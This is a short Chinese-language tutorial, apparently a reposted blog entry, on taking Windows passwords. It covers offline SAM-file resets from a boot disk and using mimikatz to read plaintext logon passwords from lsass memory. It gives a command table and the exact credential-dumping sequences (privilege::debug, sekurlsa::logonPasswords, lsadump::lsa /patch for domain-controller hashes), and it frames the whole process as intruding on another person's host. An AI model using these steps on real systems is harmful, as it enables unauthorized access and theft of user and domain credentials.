使用mimikatz抓取windows管理员密码
目錄
- 基于SAM文件的密碼破解
- Mimikatz是個(gè)啥?
- mimikatz基礎(chǔ)命令
- 抓取windows密碼
- 使用mimikatz讀取域控上所有域用戶的hash值
基于SAM文件的密碼破解
SAM文件即賬號(hào)密碼數(shù)據(jù)庫文件。 當(dāng)我們登錄系統(tǒng)的時(shí)候,系統(tǒng)會(huì)自動(dòng)地和 C:\Windows\System32\config\SAM 中的SAM文件自動(dòng)校對(duì),如發(fā)現(xiàn)此次密碼與SAM文件中的加密數(shù)據(jù)符合時(shí),你就會(huì)順利登錄;如果錯(cuò)誤則無法登錄。在系統(tǒng)運(yùn)行期間,SAM文件一直是被占用的,是無法打開和編輯復(fù)制的,我們可以進(jìn)入PE系統(tǒng)進(jìn)行復(fù)制然后在利用軟件進(jìn)行密碼的修改
U盤啟動(dòng),運(yùn)行DiskGenius分區(qū)工具
找到 SAM 文件,復(fù)制到U盤
在另一臺(tái)電腦上下載軟件 NTPWedit 并運(yùn)行,打開 SAM 文件,解鎖并修改密碼,然后把 SAM 文件復(fù)制到原來的電腦上,覆蓋原文件。或者我們可以直接利用工具(一般的啟動(dòng)盤PE中都有密碼重置功能)一鍵重置。但是這樣就完美的暴露了我們?nèi)肭至藢?duì)方的主機(jī)
注意:這樣只能修改密碼,并不能知道密碼的明文
Mimikatz是個(gè)啥?
mimikatz是一款功能強(qiáng)大的輕量級(jí)調(diào)試神器,通過它你可以提升進(jìn)程權(quán)限注入進(jìn)程讀取進(jìn)程內(nèi)存,他可以直接從 lsass中獲取當(dāng)前處于Active系統(tǒng)的登錄密碼, lsass是微軟Windows系統(tǒng)的安全機(jī)制它主要用于本地安全和登陸策略,通常我們?cè)诘顷懴到y(tǒng)時(shí)輸入密碼之后,密碼便會(huì)儲(chǔ)存在 lsass內(nèi)存中,經(jīng)過其 wdigest 和 tspkg 兩個(gè)模塊調(diào)用后,對(duì)其使用可逆的算法進(jìn)行加密并存儲(chǔ)在內(nèi)存之中, 而mimikatz正是通過對(duì)lsass的逆算獲取到明文密碼!也就是說只要你不重啟電腦,就可以通過他獲取到登陸密碼,只限當(dāng)前登陸系統(tǒng)!
注意:mimikatz的使用需要administrator權(quán)限,否則會(huì)提權(quán)失敗。
mimikatz基礎(chǔ)命令
| ? exit | 退出 |
| ? version | 查看mimikatz的版本 |
| ? system::user | 查看當(dāng)前登錄的系統(tǒng)用戶 |
| ? system::computer | 查看計(jì)算機(jī)名稱 |
| ? process::list | 列出進(jìn)程 |
| ? process::suspend 進(jìn)程名稱 | 暫停進(jìn)程 |
| ? process::stop 進(jìn)程名稱 | 結(jié)束進(jìn)程 |
| ? process::modules | 列出系統(tǒng)的核心模塊及所在位置 |
| ? service::list | 列出系統(tǒng)的服務(wù) |
| ? service::remove | 移除系統(tǒng)的服務(wù) |
| ? service::start stop 服務(wù)名稱 | 啟動(dòng)或停止服務(wù) |
| ? privilege::list | 列出權(quán)限列表 |
| ? privilege::enable | 激活一個(gè)或多個(gè)權(quán)限 |
| ? privilege::debug | 提升權(quán)限 |
| ? nogpo::cmd | 打開系統(tǒng)的cmd.exe |
| ? nogpo::regedit | 打開系統(tǒng)的注冊(cè)表 |
| ? nogpo::taskmgr | 打開任務(wù)管理器 |
| ? ts::sessions | 顯示當(dāng)前的會(huì)話 |
| ? ts::processes | 顯示進(jìn)程和對(duì)應(yīng)的pid情況等 |
| ? sekurlsa::wdigest | 獲取本地用戶信息及密碼 |
| ? sekurlsa::tspkg | 獲取tspkg用戶信息及密碼 |
| ? sekurlsa::logonPasswords | 獲登陸用戶信息及密碼 |
抓取windows密碼
操作很簡單,兩步搞定
首先需要提權(quán):privilege::debug
然后抓取明文密碼:sekurlsa::logonPasswords
使用mimikatz讀取域控上所有域用戶的hash值
第一步依然是提升權(quán)限:privilege::debug
第二步抓取密碼:lsadump::lsa /patch
總結(jié)
以上是生活随笔為你收集整理的使用mimikatz抓取windows管理员密码的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: EDG 官宣 Clearlove(明凯)
- 下一篇: 银联pos小票word模板_商家pos机